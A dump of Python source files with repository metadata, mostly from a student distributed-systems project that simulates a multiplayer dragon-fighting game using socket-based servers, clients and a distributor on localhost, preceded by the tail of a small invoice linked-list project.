"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "import os\nimport uuid\n\n\ndef clear():\n os.system('cls' if os.name == 'nt' else 'clear')\n\n\ndef pause():\n print(\"\\n--------------------------------------------- \")\n print(\" [ Press Enter to continue ] \")\n print(\"--------------------------------------------- \")\n input()\n\n\ndef emptyData():\n print(\"\\n\\tNo existen FACTURAS en este momento.....!!!!\\n\")\n\n\ndef getRandomID():\n return uuid.uuid4().hex[:4]"
},
{
"alpha_fraction": 0.49484536051750183,
"alphanum_fraction": 0.5051546096801758,
"avg_line_length": 31.22222137451172,
"blob_id": "fa449cbd03f3dc46531b073ab1792a0992dab129",
"content_id": "b6fdbdcc818751b73f1948d38ac1aca0d795ba64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 291,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 9,
"path": "/models/Product.py",
"repo_name": "richardnarvaez/lista_enlazada_factura",
"src_encoding": "UTF-8",
"text": "\nclass Product:\n def __init__(self, _name=None, _price=None):\n self.count = 0\n self.name = _name\n self.price = _price\n self.total = 0.0\n\n def printProduct(self):\n print(\"\\t\", self.count, \" \", self.name, \" \", self.price, \" \", self.total)\n"
}
] | 5 |
neverbeam/distributed-systems
|
https://github.com/neverbeam/distributed-systems
|
0bbec55915fd9895fc7672eec55e49437fce005f
|
ef8d63c15a54182c969069c37c2be1cbd52b4b78
|
466a34937267f249bf5bca14fdc45f69f50629d5
|
refs/heads/master
| 2020-04-06T23:40:23.554225 | 2019-01-16T21:01:55 | 2019-01-16T21:01:55 | 157,877,384 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4699978232383728,
"alphanum_fraction": 0.4854058027267456,
"avg_line_length": 36.84804916381836,
"blob_id": "d933ea8ea904e1385627e34242b06effef7835c4",
"content_id": "1d468273a3a45e3a97889e496b41e8555b23d28d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18432,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 487,
"path": "/populator.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import multiprocessing as mp\nfrom distributor import Distributor\nfrom server import Server\nfrom client import Client\nimport time\nimport pandas\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport os\nimport sys\n\n\nclass Populator:\n def __init__(self, manual=False, experiment_num=0, experiment_arg=1):\n mp.set_start_method('spawn')\n self.commands = self.list_commands()\n self.keep_alive = True\n self.servers = {}\n self.clients = {}\n self.speedup = 1.0\n self.printing = False\n\n if manual:\n self.get_input()\n else:\n if experiment_num == 1:\n self.test_setup_2s_2c()\n elif experiment_num == 2:\n self.wow_setup()\n elif experiment_num == 3:\n self.test_setup_geo(experiment_arg, 100)\n elif experiment_num == 4:\n self.test_setup_max()\n\n # creates a running client\n def client_process(self, distr_port, play_time, lat, lng, demo=False):\n # Connect to the host\n c = Client(distr_port=distr_port, demo=demo, life_time=play_time, lat=lat, lng=lng, speedup=self.speedup, printing=self.printing)\n print(\"Created client process\")\n if c.joined_game:\n # Receive input from servers\n c.start_receiving()\n # let the client do moves until its playtime is up\n c.player_moves()\n\n # remove the player from the server\n c.disconnect_server()\n print(\"Closing client process connected to server on port \" + str(c.port))\n else:\n print(\"No game available\")\n\n\n # creates a running server\n def server_process(self, client_port, peer_port, distr_port, run_time, check_alive, ID, lat, lng, num_dragons=1):\n # Setup a new server\n s = Server(port=client_port, peer_port=peer_port, life_time=run_time, check_alive=check_alive,\n ID=ID, lat=lat, lng=lng, num_dragons=num_dragons, speedup=self.speedup, printing=self.printing)\n print(\"Created server process \" + str(client_port))\n # tell the distributor you exist\n s.tell_distributor(distr_port)\n # let the server handle all incoming messages\n s.read_ports()\n print(\"Server closed on port \" + str(client_port))\n\n\n # creates a running distributor\n def distributor_process(self, listen_port, run_time):\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n d = Distributor(port=listen_port, life_time=run_time, speedup=self.speedup, printing=self.printing)\n print(\"Created distributor process \" + str(listen_port))\n # let the distributor listen to all incoming messages until lifetime is up\n d.read_ports()\n print(\"Distributor closed on port \" + str(listen_port))\n\n\n # runs a test version that should work (has 2 players and 2 servers)\n def test_setup_2s_2c(self):\n # allow printing to terminal\n self.printing = True\n # set a speedup factor for testing\n self.speedup = 2.0\n\n # initialize the distributor\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, 23))\n d.start()\n time.sleep(0.3/self.speedup)\n\n servers = []\n num_servers = 2\n for i in range(num_servers):\n # run a server\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, 20, 1, i*100, 1, 1, 2.3))\n s.start()\n servers.append(s)\n time.sleep(0.1/self.speedup)\n\n # spawn a client process\n c1 = mp.Process(target=self.client_process, args=(dp, 15, 1, 1))\n c1.start()\n\n # spawn another client process\n time.sleep(1/self.speedup)\n c2 = mp.Process(target=self.client_process, args=(dp, 10, 1, 1))\n c2.start()\n\n # wait until the client processes terminate\n c2.join()\n c1.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n 
# runs a test version pushing the bounds of player/server/player total\n def test_setup_max(self, num_servers=5, num_clients=100, speedup=1.0):\n self.speedup = speedup\n self.printing = True\n # initialize the distributor\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, 45*self.speedup))\n d.start()\n time.sleep(0.3)\n\n servers = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, 40*self.speedup, 1, server_id, 1, 1, 4))\n s.start()\n servers.append(s)\n time.sleep(0.2)\n\n time.sleep(0.2)\n clients = []\n for i in range(num_clients):\n # spawn a client process\n c = mp.Process(target=self.client_process, args=(dp, 15*self.speedup, 1, 1))\n c.start()\n clients.append(c)\n time.sleep(0.0)\n\n # wait until the client processes terminate\n for c in clients:\n c.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n # runs a test version based on geolocations\n def test_setup_geo(self, num_root_servers, num_players):\n # initialize the distributor\n dp = 11000\n # create a distributor that terminates after all servers are done\n d = mp.Process(target=self.distributor_process, args=(dp, num_players*2.7+3))\n d.start()\n time.sleep(0.5)\n\n # create servers with different geo locations\n servers = []\n space_between_servers = 1./num_root_servers\n for i in range(num_root_servers):\n sx = (i+1) * space_between_servers - space_between_servers/2.\n for j in range(num_root_servers):\n sy = (j+1) * space_between_servers\n # run a server on those latitude longitude\n server_num = (i*num_root_servers)+j\n # create servers that are closed when all players are done\n s = mp.Process(target=self.server_process, args=(10000+server_num, 10100+server_num, dp,\n num_players*2.5+1, 1, server_num*(num_players+1), sy, sx))\n s.start()\n servers.append(s)\n\n time.sleep(num_players*0.2)\n\n # create clients with random geo locations in [1,1]\n clients = []\n for i in range(num_players):\n x = random.random()\n y = random.random()\n # spawn a client process\n c = mp.Process(target=self.client_process, args=(dp, 2, y, x))\n c.start()\n clients.append(c)\n time.sleep(2)\n\n # wait until the client processes terminate\n for c in clients:\n c.join()\n # then close the servers\n for s in servers:\n s.join()\n # then close the distributor\n d.join()\n\n\n # use the game trace to create clients with a given lifespan\n def wow_setup(self):\n # setup for running game trace\n trace_start = time.time()\n sim_time = 60\n join_step = 2\n num_servers = 5\n dragons_per_server = 1\n self.printing = True\n self.speedup = 1\n\n # use for running multiple sims\n # self.printing = False\n # join_steps = [0.5, 0.7, 1]\n # for join_step in join_steps:\n # with open(\"join_step_results.txt\", \"a\") as join_step_results:\n # join_step_results.write(\"--------------\\njoin step: \"+str(join_step))\n # self.speedup = join_step/2\n # for n in range(4):\n\n try: \n # create a distributor that terminates after all servers are done\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, sim_time*self.speedup))\n d.start()\n time.sleep(0.5)\n\n servers = []\n logfiles = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, (sim_time-5)*self.speedup, 1, server_id, 1, 1, dragons_per_server))\n s.start()\n servers.append(s)\n 
logfiles.append(\"logfile\"+str(server_id))\n time.sleep(0.2)\n\n # start populating\n clients = []\n play_dist = pickle.load( open( \"wow_trace.p\", \"rb\" ) )\n populating = True\n # keep adding players until end of simulation\n while (trace_start + (sim_time-10)*self.speedup) > time.time():\n # get a random lifetime from the wow distribution\n playtime = play_dist[random.randint(0, len(play_dist)-1)] / 100.0\n # create the client\n c = mp.Process(target=self.client_process, args=(dp,playtime*self.speedup,1,1))\n c.start()\n clients.append(c)\n # wait the set amount of time between adding players\n time.sleep(join_step)\n\n # close all still opened server connections\n for s in servers:\n s.join()\n # close all still opened client connections\n for c in clients:\n c.join()\n d.join()\n except OSError:\n print(\"Broke off because off to much clients. \")\n\n time.sleep(10)\n # analyze who won\n all_last_messages = \"\"\n dragon_win = 0\n player_win = 0\n invalids = 0\n for logfile in logfiles:\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n for line in lines:\n if line == \"WIN DRAGONS\":\n dragon_win += 1\n break\n elif line == \"WIN PLAYERS\":\n player_win += 1\n break\n elif line == \"invalid update\":\n invalids += 1\n # show who won\n with open(\"join_step_results.txt\", \"a\") as join_step_results:\n if dragon_win == player_win:\n join_step_results.write(\"Draw\")\n elif dragon_win > player_win:\n join_step_results.write(\"Dragon win\")\n else:\n join_step_results.write(\"Player win\")\n join_step_results.write(str(invalids))\n\n\n # count and show the fraction of wrong moves for different latencies\n def test_setup_invalids(self):\n # try out latencies\n latencies = [0.0]\n n = 7\n\n with open(\"valid_counts.txt\", \"a\") as file_with_counts:\n file_with_counts.write(\"\\nNew run\\n\")\n\n for latency in latencies:\n print(\"Testing latency: \", latency)\n for ni in range(n):\n # setup for consistant latency\n sim_time = 60\n sx = 1\n sy = 0\n cx = 1 - latency\n cy = 0\n dragons_per_server = 1\n num_servers = 4\n num_clients = 20\n self.printing = False\n self.speedup = 0.5\n\n logfiles = []\n didnt_crash = False\n while not didnt_crash:\n try: \n # create a distributor that terminates after all servers are done\n dp = 11000\n d = mp.Process(target=self.distributor_process, args=(dp, sim_time*self.speedup))\n d.start()\n time.sleep(0.5)\n\n # add servers\n servers = []\n for i in range(num_servers):\n # run a server\n server_id = i*1000\n s = mp.Process(target=self.server_process, args=(10000+i, 10100+i, dp, (sim_time-5)*self.speedup, 1, server_id, sx, sy, dragons_per_server))\n s.start()\n servers.append(s)\n logfiles.append(\"logfile\"+str(server_id))\n time.sleep(0.2)\n\n # add clients\n clients = []\n for i in range(num_clients):\n # create the client\n c = mp.Process(target=self.client_process, args=(dp,(sim_time-10)*self.speedup,cx,cy))\n c.start()\n clients.append(c)\n time.sleep(3/float(num_clients))\n\n # close all still opened server connections\n for s in servers:\n s.join()\n # close all still opened client connections\n for c in clients:\n c.join()\n d.join()\n didnt_crash = True\n except OSError:\n print(\"Broke off because of to much clients. 
\")\n time.sleep(60)\n logfiles = []\n\n time.sleep(5)\n # count em all up\n all_last_messages = \"\"\n valids = 0\n invalids = 0\n for logfile in logfiles:\n with open(logfile, 'r') as f:\n lines = f.read().splitlines()\n for line in lines:\n if line == \"invalid update\":\n invalids += 1\n else:\n valids += 1\n # report them\n with open(\"valid_counts.txt\", \"a\") as file_with_counts:\n file_with_counts.write(str(latency)+\";\"+str(invalids)+\";\"+str(valids)+\"\\n\")\n\n\n\n # DEPRECATED, DOES NOT WORK ANYMORE\n # asks you for input, so that you can create/kill/list servers/clients\n def get_input(self):\n while self.keep_alive:\n print(\"-----COMMANDS-----\")\n for command in self.commands:\n print(command)\n print(\"------------------\")\n nocap_input = input().lower()\n # split on any whitespaces\n args = nocap_input.split()\n\n if len(args) > 1:\n # check to see if a quantity is given\n quantity = 1\n if len(args) >= 2:\n try:\n quantity = int(args[2])\n except (ValueError, TypeError):\n print(\"Not an integer quantity, setting to 1.\")\n\n # handles spawn input\n if args[0] == \"spawn\":\n name_i = 1\n if args[1] == \"s\":\n for i in range(quantity):\n name = None\n while name == None:\n try_name = \"s\" + str(i)\n if try_name not in self.servers.keys():\n name = try_name\n # create and start the process\n self.servers[name] = mp.Process(target=self.server_process, args=(10000,))\n self.servers[name].start()\n print(\"Added server: \" + name)\n elif args[1] == \"c\":\n for i in range(quantity):\n name = None\n while name == None:\n try_name = \"c\" + str(i)\n if try_name not in self.clients.keys():\n name = try_name\n # create and start the process\n self.clients[name] = mp.Process(target=self.client_process, args=(10000,))\n self.clients[name].start()\n print(\"Added client: \" + name)\n else:\n print(\"Pick s or c.\")\n\n # handles killing a given server/client\n elif args[0] == \"kill\":\n name = args[1]\n if name[0] == \"s\":\n if name in self.servers:\n # TODO: actually kill the servers process\n self.servers.pop(name, None)\n print(\"Succesfully terminated: \" + name)\n else:\n print(\"Dont recognise this server name\")\n elif name[0] == \"c\":\n if name in self.clients:\n # TODO: actually kill the clients process\n self.clients.pop(name, None)\n print(\"Succesfully terminated: \" + name)\n else:\n print(\"Dont recognise this client name\")\n else:\n print(\"Pick s or c.\")\n\n else:\n print(\"You have unrecognised input\")\n\n elif len(args) > 0:\n # show the lists of servers and clients\n if args[0] == \"list\":\n print(\"Servers:\")\n for name, s_obj in self.servers.items():\n print(\"\\t\" + name + \"\\t\" + str(s_obj))\n\n print(\"Clients:\")\n for name, c_obj in self.clients.items():\n print(\"\\t\" + name + \"\\t\" + str(c_obj))\n\n else:\n print(\"Need more arguments\")\n\n print() #empty line for style\n\n\n def list_commands(self):\n return [\n \"spawn [s/c] [quantity]\",\n \"kill [s/c + number]\",\n \"list\"\n ]\n\n\n\nif __name__ == '__main__':\n import sys\n experiment_num = int(sys.argv[1])\n experiment_arg = 0\n if experiment_num == 3:\n experiment_arg = int(sys.argv[2])\n p = Populator(manual=False, experiment_num=experiment_num, experiment_arg=experiment_arg)\n"
},
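The Populator above drives every experiment by wrapping the Distributor, Server, and Client classes in `multiprocessing.Process` workers, staggering their start-up and joining them in reverse dependency order. A minimal, standalone sketch of that spawn/join pattern — `worker` is a hypothetical stand-in for the repo's `*_process` methods, not code from the project:

    import multiprocessing as mp
    import time

    def worker(port, run_time):
        # stand-in for distributor_process / server_process / client_process
        print("worker listening on port", port)
        time.sleep(run_time)

    if __name__ == "__main__":
        mp.set_start_method("spawn")        # same start method the Populator sets
        procs = []
        for i in range(3):
            p = mp.Process(target=worker, args=(10000 + i, 1))
            p.start()                       # each component runs in its own process
            procs.append(p)
            time.sleep(0.1)                 # stagger start-up, as the experiments do
        for p in procs:
            p.join()                        # block until every worker terminates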
{
"alpha_fraction": 0.45675355195999146,
"alphanum_fraction": 0.4757108986377716,
"avg_line_length": 36.098899841308594,
"blob_id": "59165efa8e361cf998fd67d59a4fc9b63ac41eb3",
"content_id": "f9df2ba40e53b6b176b08bc99dd417b828525570",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 91,
"path": "/Game.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "from Player import *\nimport client\n\nclass Game:\n\n def __init__(self, upper, ID=1, max_player=100, max_dragon=25):\n self.ID = ID\n self.width = 25 + 1\n self.height = 25 + 1\n self.max_players = max_player\n self.max_dragons = max_dragon\n self.map = [[\"*\" for j in range(self.width)] for i in range(self.height)]\n self.players = {}\n self.upper = upper\n\n def add_player(self, player):\n \"\"\" Add players to the grid.\"\"\"\n if player.ID in self.players.keys():\n return\n\n if self.map[player.y][player.x] == \"*\":\n self.map[player.y][player.x] = player\n self.players[player.ID] = player\n print(\"Player ({0}) with hp {1} added to the game at position ({2},{3}).\".format(player.ID, player.hp, player.x, player.y))\n else:\n print(\"Error: Position ({0},{1}) is occupied with {2}\".format(player.x, player.y, self.map[player.y][player.x].ID))\n\n def remove_player(self, player):\n \"\"\" Remove players from the grid.\"\"\"\n y = player.y\n x = player.x\n if self.map[y][x] == \"*\":\n print(\"Error: Cannot remove player, spot {} {} is empty {}.\".format(player.y, player.x, player.ID))\n else:\n del self.players[player.ID]\n self.map[y][x] = \"*\"\n\n def update_grid(self, data):\n \"\"\"Update my grid\"\"\"\n #print (\"UPDATING GRID WITH: \", data)\n # timestamp;move;player;up/down/left/rigth\n data = data.split(\";\")[1:]\n\n try:\n if data[0] == \"move\":\n player = self.players[data[1]]\n self.map[player.y][player.x] = \"*\"\n if player.move_player(data[2]):\n self.map[player.y][player.x] = player\n print(\"new coordinates\", player.ID, player.y, player.x)\n return 1\n else:\n self.map[player.y][player.x] = player\n return 0\n # attack;player1;player2\n elif data[0] == \"attack\":\n player1 = self.players[data[1]]\n player2 = self.players[data[2]]\n if player1.attack(player2):\n return 1\n else:\n return 0\n # join;playerid;x;y;hp;ap\n elif data[0] == \"join\":\n player = Player(data[1], int(data[2]), int(data[3]), self)\n player.hp = int(data[4])\n player.ap = int(data[5])\n self.add_player(player)\n return 1\n elif data[0] == \"addeddragon\":\n player = Dragon(data[1], int(data[2]), int(data[3]), self)\n player.hp = int(data[4])\n player.ap = int(data[5])\n self.add_player(player)\n return 1\n elif data[0] == \"leave\":\n player = self.players[data[1]]\n self.remove_player(player)\n return 1\n elif data[0] == \"heal\":\n player1 = self.players[data[1]]\n player2 = self.players[data[2]]\n if player1.heal_player(player2):\n return 1\n return 0\n\n else:\n print(\"Not a valid command:\", data)\n return 0\n except KeyError as e:\n return 0\n"
},
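`update_grid` above dispatches on semicolon-delimited commands whose leading timestamp is stripped before the verb is inspected. A hedged, self-contained illustration of that wire format (the player id and direction are made-up values):

    import time

    # a move command as the servers exchange it: timestamp;verb;player;direction(;end)
    message = "{};move;{};{};end".format(time.time(), "p1", "left")

    payload = message.split("end")[0]   # drop the terminator
    fields = payload.split(";")[1:]     # drop the timestamp, as update_grid does
    verb, player_id, direction = fields[0], fields[1], fields[2]
    print(verb, player_id, direction)   # -> move p1 left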
{
"alpha_fraction": 0.4942176640033722,
"alphanum_fraction": 0.5024124979972839,
"avg_line_length": 39.052146911621094,
"blob_id": "bfb61f07b58d6ef33b75cde0daee00ddb14f63ca",
"content_id": "469f594a0a11ec0275ba5f72321b5bc0d54fd10e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13057,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 326,
"path": "/client.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport time\nfrom threading import Thread\nfrom queue import Queue\nimport Game\nfrom Player import *\nimport numpy as np\nimport os\nimport sys\n\nclass Client:\n def __init__(self, distr_port=11000, demo=False, life_time=1000, lat=1, lng=1, speedup=1.0, printing=True):\n self.joined_game = False\n self.demo = demo\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n self.keep_alive = True\n self.distr_port = distr_port\n self.lat = lat\n self.lng = lng\n self.latency = 0\n retries = 0\n max_retries = 5\n while retries < max_retries:\n server_port = self.get_server(self.distr_port)\n if server_port == 0:\n # set max_retries to stop searching, because there is no distributor\n retries = max_retries\n else:\n # try and connect to the given server\n self.sock, found = self.connect_server(port=server_port)\n # if given server was not valid, try for another\n if not found:\n retries += 1\n else:\n # found one, stop searching\n retries = max_retries\n # do not let the client play a game if there is no game\n if server_port != 0:\n # no distributor up and running\n self.joined_game = True\n self.queue = Queue()\n\n def receive_grid(self, sock):\n \"\"\" Receive the current state of the grid from the server. \"\"\"\n try:\n self.game = Game.Game(self)\n data = \"\"\n # Keep receiving until an end has been send. TCP gives in order arrival\n while True:\n data += sock.recv(128).decode('utf-8')\n if data[-3:] == \"end\":\n break\n\n #Parse the data so that the user contains the whole grid.\n\n # type, ID, x, y, hp , ap,\n data = data[:-3].split(\";\")\n del data[-1]\n for i in range(0, len(data), 6):\n playerdata = data[i:i+6]\n if playerdata[0] == \"Player\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Dragon\":\n player = Dragon(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Myplayer\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.max_hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n self.myplayer = player\n\n self.game.add_player(player)\n\n print ( \"succesfully received grid\")\n except ConnectionResetError:\n print(\"Retrying connection setup between client to server\")\n return False\n\n return True\n\n def get_server(self, distr_port=11000):\n \"\"\"talk to the distributor to get a server port to connect to\"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n try:\n # send a message to the distributor\n s.connect(('localhost', distr_port))\n except ConnectionRefusedError:\n # no distributor up and running\n return 0\n lat_str = \"{:.4f}\".format(self.lat)\n lng_str = \"{:.4f}\".format(self.lng)\n send_data = \"CLIENT|\" + lat_str + \";\" + lng_str\n s.sendall(send_data.encode('utf-8'))\n # get a server port back from the distributor\n data = s.recv(1024)\n message = data.decode('utf-8')\n if message.startswith('DIST|'):\n dist_mess = message.split(\"|\")\n if len(dist_mess) != 3:\n # ill defined message\n pass\n else:\n try:\n # get the game server and latency from 
the distributor\n server_port = int(dist_mess[1])\n latency = float(dist_mess[2])\n self.latency = latency\n return server_port\n except ValueError:\n # message was not an integer\n pass\n # distributor did not respond, should not happen\n print(\"ERROR: no distributor response\")\n return 0\n\n def connect_server(self, port=10000):\n \"\"\" Connect to the server. \"\"\"\n # this happens when there is no distributor\n if port == 0:\n return 0, False\n\n self.port = port\n\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = ('localhost', port)\n print('Client connecting to {} port {}'.format(*server_address))\n # see if it is still up\n try:\n sock.connect(server_address)\n success = self.receive_grid(sock)\n return sock, success\n except ConnectionRefusedError:\n return sock, False\n\n def disconnect_server(self):\n \"\"\" disconnect from the server\"\"\"\n # close the socket\n try:\n self.sock.shutdown(socket.SHUT_WR)\n except:\n # lots of things can go wrong here, just catch them all\n pass\n\n def send_message(self, message):\n \"\"\" Send an message/action to the server\"\"\"\n # Send data\n print('sending {!r}'.format(message))\n try:\n # simulate latency\n time.sleep(self.latency/self.speedup)\n # then send the message\n self.sock.sendall(message.encode('utf-8'))\n return True\n except BrokenPipeError:\n return False\n\n def start_receiving(self):\n \"\"\"Thread for doing moves + send moves\"\"\"\n Thread(target=self.server_input, args=(self.queue,), daemon = True).start()\n\n def player_moves(self):\n \"\"\" User input function. \"\"\"\n while self.keep_alive:\n # First process server dataself.\n while not self.queue.empty():\n data = self.queue.get()\n #print( \"data from thread:\", data)\n if len(data) > 0:\n self.game.update_grid(data)\n # do something with row\n self.queue.task_done()\n\n message = \"\"\n # check if the player should disconnect based on playtime or when hp is low\n if self.life_time < (time.time() - self.start_time)*self.speedup or self.myplayer.hp <= 0:\n # Let the server know you want to disconnect\n print (\"DISCONNECTING player\", self.myplayer.ID)\n self.keep_alive = 0\n continue\n\n else:\n # This message should be created by an automated system (computer that plays game)\n time.sleep(1/self.speedup)\n\n # NOrmal order -> look for heals -> look for attacks -> MOve\n # Look for heals in space around me\n playerlist = []\n dragonlist = []\n for object in self.game.players.values():\n if isinstance(object, Player) and self.myplayer.get_distance(object) < 6:\n playerlist.append(object)\n elif isinstance(object, Dragon):\n dragonlist.append(object)\n\n if not dragonlist:\n print (\"Players won!\")\n self.keep_alive = 0\n\n for player in playerlist:\n if player.hp < 0.5*player.max_hp and player != self.myplayer:\n message = \"heal;{};{};end\".format(self.myplayer.ID, player.ID)\n break\n\n # Message unchanged , no healing done\n if message == \"\":\n for dragon in dragonlist:\n if self.myplayer.get_distance(dragon)<3:\n message = \"attack;{};{};end\".format(self.myplayer.ID, dragon.ID)\n break\n \n # message unchanged, no dragon in place\n if message == \"\":\n # Find the closest dragon\n min_dragon_distance = 60\n for dragon in dragonlist:\n if self.myplayer.get_distance(dragon) < min_dragon_distance:\n min_dragon_distance = self.myplayer.get_distance(dragon)\n min_dragon = dragon\n\n # move to this dragon.\n directions = []\n if 
(min_dragon.x-self.myplayer.x)<0:\n directions.append(\"left\")\n elif (min_dragon.x-self.myplayer.x)>0:\n directions.append(\"right\")\n elif (min_dragon.y-self.myplayer.y)<0:\n directions.append(\"down\")\n elif (min_dragon.y-self.myplayer.y)>0:\n directions.append(\"up\")\n message = \"move;{};{};end\".format(self.myplayer.ID, np.random.choice(directions))\n\n #message = \"Debug message;, time=\" + str(time.time() - self.start_time)\n message_send = self.send_message(message)\n if not message_send:\n print(\"Server went down, look for new one\")\n\n retries = 0\n max_retries = 5\n while retries < max_retries:\n server_port = self.get_server(self.distr_port)\n if server_port == 0:\n # set max_retries to stop searching, because there is no distributor\n retries = max_retries\n else:\n # try and connect to the given server\n self.sock, found = self.connect_server(port=server_port)\n # if given server was not valid, try for another\n if not found:\n retries += 1\n else:\n # server was good, start communicating\n self.queue = Queue()\n self.start_receiving()\n # found one, stop searching\n retries = max_retries\n # do not let the client play a game if there is no game\n if server_port == 0:\n # no distributor up and running\n self.keep_alive = False\n\n self.disconnect_server()\n\n def server_input(self, queue):\n \"\"\" Check for server input. \"\"\"\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n readable, writable, errored = select.select([self.sock], [], [])\n\n data = b''\n while True:\n data += self.sock.recv(64)\n # simulate latency\n time.sleep(self.latency/self.speedup)\n # update my update_grid\n if data[-9:] == b'endupdate':\n break\n\n for item in data[:-9].decode('utf-8').split('end'):\n queue.put(item)\n #print (\"message: incomming \" + data.decode('utf-8'))\n except:\n # lots of things can go wrong here, just catch them all\n break\n\n\n\nif __name__ == \"__main__\":\n import sys\n distr_port = int(sys.argv[1])\n play_time = int(sys.argv[2])\n lat = int(sys.argv[3])\n lng = int(sys.argv[4])\n\n # Connect to the host\n c = Client(distr_port=distr_port, demo=False, life_time=play_time, lat=lat, lng=lng)\n print(\"Created client process\")\n if c.joined_game:\n # Receive input from servers\n c.start_receiving()\n # let the client do moves until its playtime is up\n c.player_moves()\n\n # remove the player from the server\n c.disconnect_server()\n time.sleep(2) #Need a timing here, to prevent too quick shutdown\n print(\"Closing client process connected to server on port \" +str(c.port))\n else:\n print(\"No game available, try again later :(\")\n"
},
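The client above keeps network reads off the game loop by running `server_input` in a daemon thread that feeds a `queue.Queue`, which `player_moves` drains once per turn. A minimal sketch of that producer/consumer shape; the socket is replaced by a hypothetical in-memory producer so the snippet runs on its own:

    import time
    from queue import Queue
    from threading import Thread

    def receiver(q):
        # stand-in for Client.server_input: the real thread reads the socket
        for i in range(3):
            q.put("update {}".format(i))
            time.sleep(0.1)

    q = Queue()
    Thread(target=receiver, args=(q,), daemon=True).start()

    deadline = time.time() + 1
    while time.time() < deadline:
        while not q.empty():            # drain pending updates, like player_moves
            data = q.get()
            print("applying", data)     # the real client calls game.update_grid here
            q.task_done()
        time.sleep(0.1)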
{
"alpha_fraction": 0.47940200567245483,
"alphanum_fraction": 0.49401992559432983,
"avg_line_length": 31.365591049194336,
"blob_id": "5369537c954827c12f01bb9e21f22cf136eb8f61",
"content_id": "9aab45639baa81900a55e1d600b138989a636957",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3010,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 93,
"path": "/Player.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import random\n\nclass User:\n\n def __init__(self, ID, x, y, game):\n self.ID = ID\n self.x = x\n self.y = y\n self.game = game\n self.maxrange = 2\n\n def attack(self, victim):\n \"\"\" Attack another player and remove if they have no hp left.\"\"\"\n distance = self.get_distance(victim)\n\n if distance > self.maxrange:\n print(\"Error: Attack not valid! Distance is greater than max.\")\n return 0\n else:\n print(\"Victim {} hp: {}\".format(victim.ID, victim.hp))\n victim.hp -= self.ap\n print(\"Victim {} hp: {}\".format(victim.ID, victim.hp))\n if victim.hp <= 0:\n print(\"player {} is dead! Remove victim from game.\".format(victim.ID))\n self.game.remove_player(victim)\n return 1\n\n\n def get_distance(self, victim):\n return (abs(self.x - victim.x) + abs(self.y - victim.y))\n\n\nclass Dragon(User):\n\n def __init__(self, ID, x, y, game):\n User.__init__(self, ID, x, y, game)\n self.type = \"Dragon\"\n self.max_hp = random.randint(50,100)\n self.ap = random.randint(5,20)\n self.hp = self.max_hp\n self.maxrange = 5\n\nclass Player(User):\n\n def __init__(self, ID, x, y, game):\n User.__init__(self, ID, x, y, game)\n self.type = \"Player\"\n self.max_hp = random.randint(10,20)\n self.ap = random.randint(1,10)\n self.hp = self.max_hp\n\n def move_player(self, direction):\n \"\"\" Move the player in the right direction. \"\"\"\n if direction == \"up\":\n if self.y == self.game.height-1 or self.game.map[self.y+1][self.x] != \"*\":\n print(\"Error: Invalid move! cannot move up\")\n return 0\n else:\n self.y += 1\n return 1\n elif direction == \"down\":\n if self.y == 0 or self.game.map[self.y-1][self.x] != \"*\":\n print(\"Error: Invalid move! Cannot move down\")\n return 0\n else:\n self.y -= 1\n return 1\n elif direction == \"left\":\n if self.x == 0 or self.game.map[self.y][self.x-1] != \"*\":\n print(\"Error: Invalid move! Cannot move left\")\n return 0\n else:\n self.x -= 1\n return 1\n elif direction == \"right\":\n if self.x == self.game.width-1 or self.game.map[self.y][self.x+1] != \"*\":\n print(\"Error: Invalid move! 